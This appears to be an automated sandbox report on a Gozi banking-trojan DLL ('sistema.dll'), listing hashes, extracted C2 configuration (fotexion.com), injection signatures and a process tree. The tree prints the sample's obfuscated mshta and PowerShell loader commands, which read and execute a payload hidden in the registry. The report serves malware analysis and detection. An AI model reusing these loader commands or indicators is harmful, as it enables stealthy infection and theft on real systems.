Analysis
-
max time kernel
154s -
max time network
169s -
platform
windows10-2004_x64 -
resource
win10v2004-20230915-en -
resource tags
arch:x64arch:x86image:win10v2004-20230915-enlocale:en-usos:windows10-2004-x64system -
submitted
12-10-2023 14:08
Static task
static1
Behavioral task
behavioral1
Sample
sistema.dll
Resource
win7-20230831-en
General
-
Target
sistema.dll
-
Size
206KB
-
MD5
72e2a5c797954e895a41be5b20f867b2
-
SHA1
419aacfb3ccea9b08277bcc9405054fa4238a597
-
SHA256
858d867cc62c0bf13b16ccdb9f6cd6022d61fc2ab98a7db60806a35c7da9b2e0
-
SHA512
77be53cf579f69ee728fafbe93568b8d4c462490ba3fe053db367798508abb0d7a838731d17e465f0a29b982eb49e1227d94c971823e1d375b2b761887e107b3
-
SSDEEP
6144:sMmIE7vr+qWNGzfXDanCU60rPP+vJsWKq12Jy:o/7DrQGzfXDeCU6cevKWXwy
Malware Config
Extracted
gozi
Extracted
gozi
5050
fotexion.com
-
base_path
/jerry/
-
build
250260
-
exe_type
loader
-
extension
.bob
-
server_id
50
Extracted
gozi
5050
fotexion.com
-
base_path
/pictures/
-
build
250260
-
exe_type
worker
-
extension
.bob
-
server_id
50
Signatures
-
Blocklisted process makes network request 1 IoCs
Processes:
rundll32.exeflow pid process 53 2704 rundll32.exe -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
mshta.exedescription ioc process Key value queried \REGISTRY\USER\S-1-5-21-919254492-3979293997-764407192-1000\Control Panel\International\Geo\Nation mshta.exe -
Suspicious use of SetThreadContext 6 IoCs
Processes:
powershell.exeExplorer.EXEdescription pid process target process PID 4112 set thread context of 3212 4112 powershell.exe Explorer.EXE PID 3212 set thread context of 3716 3212 Explorer.EXE RuntimeBroker.exe PID 3212 set thread context of 3936 3212 Explorer.EXE RuntimeBroker.exe PID 3212 set thread context of 3096 3212 Explorer.EXE RuntimeBroker.exe PID 3212 set thread context of 4660 3212 Explorer.EXE RuntimeBroker.exe PID 3212 set thread context of 4556 3212 Explorer.EXE cmd.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
rundll32.exepowershell.exeExplorer.EXEpid process 2704 rundll32.exe 2704 rundll32.exe 4112 powershell.exe 4112 powershell.exe 4112 powershell.exe 3212 Explorer.EXE 3212 Explorer.EXE 3212 Explorer.EXE 3212 Explorer.EXE 3212 Explorer.EXE 3212 Explorer.EXE 3212 Explorer.EXE 3212 Explorer.EXE 3212 Explorer.EXE 3212 Explorer.EXE 3212 Explorer.EXE 3212 Explorer.EXE 3212 Explorer.EXE 3212 Explorer.EXE 3212 Explorer.EXE 3212 Explorer.EXE 3212 Explorer.EXE 3212 Explorer.EXE 3212 Explorer.EXE 3212 Explorer.EXE 3212 Explorer.EXE 3212 Explorer.EXE 3212 Explorer.EXE 3212 Explorer.EXE 3212 Explorer.EXE 3212 Explorer.EXE 3212 Explorer.EXE 3212 Explorer.EXE 3212 Explorer.EXE 3212 Explorer.EXE 3212 Explorer.EXE 3212 Explorer.EXE 3212 Explorer.EXE 3212 Explorer.EXE 3212 Explorer.EXE 3212 Explorer.EXE 3212 Explorer.EXE 3212 Explorer.EXE 3212 Explorer.EXE 3212 Explorer.EXE 3212 Explorer.EXE 3212 Explorer.EXE 3212 Explorer.EXE 3212 Explorer.EXE 3212 Explorer.EXE 3212 Explorer.EXE 3212 Explorer.EXE 3212 Explorer.EXE 3212 Explorer.EXE 3212 Explorer.EXE 3212 Explorer.EXE 3212 Explorer.EXE 3212 Explorer.EXE 3212 Explorer.EXE 3212 Explorer.EXE 3212 Explorer.EXE 3212 Explorer.EXE 3212 Explorer.EXE 3212 Explorer.EXE -
Suspicious behavior: MapViewOfSection 6 IoCs
Processes:
powershell.exeExplorer.EXEpid process 4112 powershell.exe 3212 Explorer.EXE 3212 Explorer.EXE 3212 Explorer.EXE 3212 Explorer.EXE 3212 Explorer.EXE -
Suspicious use of AdjustPrivilegeToken 8 IoCs
Processes:
powershell.exeExplorer.EXERuntimeBroker.exedescription pid process Token: SeDebugPrivilege 4112 powershell.exe Token: SeShutdownPrivilege 3212 Explorer.EXE Token: SeCreatePagefilePrivilege 3212 Explorer.EXE Token: SeShutdownPrivilege 3212 Explorer.EXE Token: SeCreatePagefilePrivilege 3212 Explorer.EXE Token: SeShutdownPrivilege 3212 Explorer.EXE Token: SeCreatePagefilePrivilege 3212 Explorer.EXE Token: SeShutdownPrivilege 3716 RuntimeBroker.exe -
Suspicious use of SetWindowsHookEx 1 IoCs
Processes:
Explorer.EXEpid process 3212 Explorer.EXE -
Suspicious use of UnmapMainImage 1 IoCs
Processes:
Explorer.EXEpid process 3212 Explorer.EXE -
Suspicious use of WriteProcessMemory 45 IoCs
Processes:
rundll32.exemshta.exepowershell.execsc.execsc.exerundll32.execontrol.exeExplorer.EXEdescription pid process target process PID 4972 wrote to memory of 2704 4972 rundll32.exe rundll32.exe PID 4972 wrote to memory of 2704 4972 rundll32.exe rundll32.exe PID 4972 wrote to memory of 2704 4972 rundll32.exe rundll32.exe PID 4988 wrote to memory of 4112 4988 mshta.exe powershell.exe PID 4988 wrote to memory of 4112 4988 mshta.exe powershell.exe PID 4112 wrote to memory of 2144 4112 powershell.exe csc.exe PID 4112 wrote to memory of 2144 4112 powershell.exe csc.exe PID 2144 wrote to memory of 3292 2144 csc.exe cvtres.exe PID 2144 wrote to memory of 3292 2144 csc.exe cvtres.exe PID 4112 wrote to memory of 4804 4112 powershell.exe csc.exe PID 4112 wrote to memory of 4804 4112 powershell.exe csc.exe PID 4804 wrote to memory of 488 4804 csc.exe cvtres.exe PID 4804 wrote to memory of 488 4804 csc.exe cvtres.exe PID 2704 wrote to memory of 3648 2704 rundll32.exe control.exe PID 2704 wrote to memory of 3648 2704 rundll32.exe control.exe PID 2704 wrote to memory of 3648 2704 rundll32.exe control.exe PID 2704 wrote to memory of 3648 2704 rundll32.exe control.exe PID 3648 wrote to memory of 3724 3648 control.exe rundll32.exe PID 3648 wrote to memory of 3724 3648 control.exe rundll32.exe PID 4112 wrote to memory of 3212 4112 powershell.exe Explorer.EXE PID 4112 wrote to memory of 3212 4112 powershell.exe Explorer.EXE PID 4112 wrote to memory of 3212 4112 powershell.exe Explorer.EXE PID 4112 wrote to memory of 3212 4112 powershell.exe Explorer.EXE PID 3212 wrote to memory of 3716 3212 Explorer.EXE RuntimeBroker.exe PID 3212 wrote to memory of 3716 3212 Explorer.EXE RuntimeBroker.exe PID 3212 wrote to memory of 3716 3212 Explorer.EXE RuntimeBroker.exe PID 3212 wrote to memory of 3716 3212 Explorer.EXE RuntimeBroker.exe PID 3212 wrote to memory of 3936 3212 Explorer.EXE RuntimeBroker.exe PID 3212 wrote to memory of 3936 3212 Explorer.EXE RuntimeBroker.exe PID 3212 wrote to memory of 3936 3212 Explorer.EXE RuntimeBroker.exe PID 3212 wrote to memory of 3936 3212 Explorer.EXE RuntimeBroker.exe PID 3212 wrote to memory of 3096 3212 Explorer.EXE RuntimeBroker.exe PID 3212 wrote to memory of 3096 3212 Explorer.EXE RuntimeBroker.exe PID 3212 wrote to memory of 3096 3212 Explorer.EXE RuntimeBroker.exe PID 3212 wrote to memory of 3096 3212 Explorer.EXE RuntimeBroker.exe PID 3212 wrote to memory of 4660 3212 Explorer.EXE RuntimeBroker.exe PID 3212 wrote to memory of 4660 3212 Explorer.EXE RuntimeBroker.exe PID 3212 wrote to memory of 4660 3212 Explorer.EXE RuntimeBroker.exe PID 3212 wrote to memory of 4660 3212 Explorer.EXE RuntimeBroker.exe PID 3212 wrote to memory of 4556 3212 Explorer.EXE cmd.exe PID 3212 wrote to memory of 4556 3212 Explorer.EXE cmd.exe PID 3212 wrote to memory of 4556 3212 Explorer.EXE cmd.exe PID 3212 wrote to memory of 4556 3212 Explorer.EXE cmd.exe PID 3212 wrote to memory of 4556 3212 Explorer.EXE cmd.exe PID 3212 wrote to memory of 4556 3212 Explorer.EXE cmd.exe
Processes
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵PID:3096
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵PID:3936
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵
- Suspicious use of AdjustPrivilegeToken
PID:3716
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of UnmapMainImage
- Suspicious use of WriteProcessMemory
PID:3212 -
C:\Windows\system32\rundll32.exerundll32.exe C:\Users\Admin\AppData\Local\Temp\sistema.dll,#12⤵
- Suspicious use of WriteProcessMemory
PID:4972 -
C:\Windows\SysWOW64\rundll32.exerundll32.exe C:\Users\Admin\AppData\Local\Temp\sistema.dll,#13⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:2704 -
C:\Windows\system32\control.exeC:\Windows\system32\control.exe -h4⤵
- Suspicious use of WriteProcessMemory
PID:3648 -
C:\Windows\system32\rundll32.exe"C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL -h5⤵PID:3724
-
-
-
-
-
C:\Windows\System32\mshta.exe"C:\Windows\System32\mshta.exe" "about:<hta:application><script>Hl3f='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Hl3f).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\2B8EB0FA-8E4D-9577-F08F-A2992433F6DD\\\LinkActive'));if(!window.flag)close()</script>"2⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:4988 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name wpkaamm -value gp; new-alias -name dvodlji -value iex; dvodlji ([System.Text.Encoding]::ASCII.GetString((wpkaamm "HKCU:Software\AppDataLow\Software\Microsoft\2B8EB0FA-8E4D-9577-F08F-A2992433F6DD").PlayPlay))3⤵
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4112 -
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\fkayfnlh\fkayfnlh.cmdline"4⤵
- Suspicious use of WriteProcessMemory
PID:2144 -
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESE589.tmp" "c:\Users\Admin\AppData\Local\Temp\fkayfnlh\CSCE80BDF20BD4141CD87F42377980332D.TMP"5⤵PID:3292
-
-
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\zfxuj2pr\zfxuj2pr.cmdline"4⤵
- Suspicious use of WriteProcessMemory
PID:4804 -
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESE9DE.tmp" "c:\Users\Admin\AppData\Local\Temp\zfxuj2pr\CSCE4CA4D8536624446809D8C09DC6512.TMP"5⤵PID:488
-
-
-
-
-
C:\Windows\syswow64\cmd.exe"C:\Windows\syswow64\cmd.exe" /C pause dll mail, ,2⤵PID:4556
-
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵PID:4660
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
1KB
MD513716aa45468135119058f96051b1186
SHA1e5f43a501be520a0e3282f342cdf24c75f7752a3
SHA256b086aabe702a88cea3d96e1207c8f1cec25b7cfaf5635d011bcf8b9ad3ce58bb
SHA512dcae1af0c3172a52558de9b7120f4c8d68aedf85b83265ce35e205f9f56f48953ab61c376073fc314831328c8cba61cf02f85f31b07d92c65a159351b51173d5
-
Filesize
1KB
MD5f03568319a28dac1bde0d4ccb5b6a30b
SHA1b9ae548c678faa4124d8cf9dbc82aa71040483fc
SHA2565ce5e0749d31ddc8b20036a75087d1c69128c19c565c815dc76fea77f7c71880
SHA512b747b5b724a0d19c35f668d193a38488ad50524f556a753b3d0eaf15b22f6905cc212f9433c89300e860986401826154d2aa5e2cffd5296631a9d8f02a3355fe
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
3KB
MD586d251cb5ad5dc3280267709ec59ad02
SHA1ab6081dd3b25e7102d27dc14ae6d63335ec9c907
SHA256690b7e1fc8e42746c4dc5f140ad8f6652c764bb8bfad8b489481bdc04d5b7093
SHA5127ba878fd771cb571d3eabae2a55af89a03740b4334ae49b2659c2c6e200dfbbc98d03b0cc7edeca5ee85a44aecc41a894d7277148931044f599ac5fadf174a77
-
Filesize
3KB
MD596df3615c98e40ba854e583697315d85
SHA1a9b1143bce21db5f3b2b3a5f61608c046a9d783c
SHA256f2a0a3670fef343e172222866d3713bdb0f1ccabe0a6adbb8471826369bda3b1
SHA512e87ca0174f7a75a85644a4139a5bfe99d651feb7c05e70a688a3075728c473f1b80e1b02251d797683005c5de3bcba36200fe2f5df54b7552c5fde7dcd36af79
-
Filesize
652B
MD5c295ffc700ac6d9abea7502be66e12ad
SHA1a41297d008f7a626a8c1e2cdc9ceeb6e5cfa1666
SHA256b2979476aa21434b29a224f6e144cdee6becf3c5a097f97774b05f6d69eb8c2d
SHA512285b3f832cf4bd15ba8b393326c7d27b97ea35bb021f98cbebaa9c4f125ea98d1689cdec5bffdb60750cb5ad6d7592d949d532e4934cf0843bc6520df0734e00
-
Filesize
405B
MD5caed0b2e2cebaecd1db50994e0c15272
SHA15dfac9382598e0ad2e700de4f833de155c9c65fa
SHA25621210b9baafb8b03ab0ef625312973a77bb5aba856c91892b65826e8b7c3b150
SHA51286dc4f8cedd37464c9c492c467375d4603715e5827dfaf7bfcfe5c46ce5e09b439139d4b0a756afa37e4c2444c5b169ac1c024217b9ba449edb183a3b53f2b62
-
Filesize
369B
MD540485703897451fea41a146151e755b9
SHA1fd1548f15afab4f57188b3ff5185b6e0526a47a1
SHA256924ebdce042d23568874923b46563aa0765c69575b4236addad572a18ba9a277
SHA512b7e89b08b69be276480f711fa36d904fdf315dd4ea2da49a8e10c2ef5bda3815f5f3dbdb840db44bbb78af289d13ce261747d2ddf3421194c4e30462ef454265
-
Filesize
652B
MD53dc5afd4597bfc44945bb6b1df0cb216
SHA1f5e17c819f0a473b2da82979b1d5de2ae9310a1a
SHA256ebc99f3bcb0191fcc926d4becbccff49849a28c4795ddeae4172a6dd0ec01005
SHA512cc9f6340d014d975225e7de32301f7101c9f7ee3c3a09cdd0b6f2d4a01f25ce2418a0a6dcb4af69d14f8db7f554923f849d6218b2d7551661672f0dc8a9cce31
-
Filesize
406B
MD5ca8887eacd573690830f71efaf282712
SHA10acd4f49fc8cf6372950792402ec3aeb68569ef8
SHA256568b0c1155379c88e91f904f4e70a3608fbf664ef890309cd705a7c5eb3232c3
SHA5122a538a308db6c7d09224737f549d442b4c206e8e9605a2570149243ee11bf0c5f028ebf003b383f86709d0dd976ff66d15ccb700f50969ff3da64dd39cab25c7
-
Filesize
369B
MD583fdce9621a651b0623dc07183ea5847
SHA140374fc1cc17f438ae612f7368b2df73a7968305
SHA256b678a460dec240aa0b3540625a039cb4d6ebe3857733723581a633aea02231f2
SHA512490000eb8f4b2f900182d3f07eea938860aec83f3da83257719a78769719fd61d7012307cffd73fcd9f8a73fa6d174c3a9ae3a894fa46e55fbafbb3cc90671cc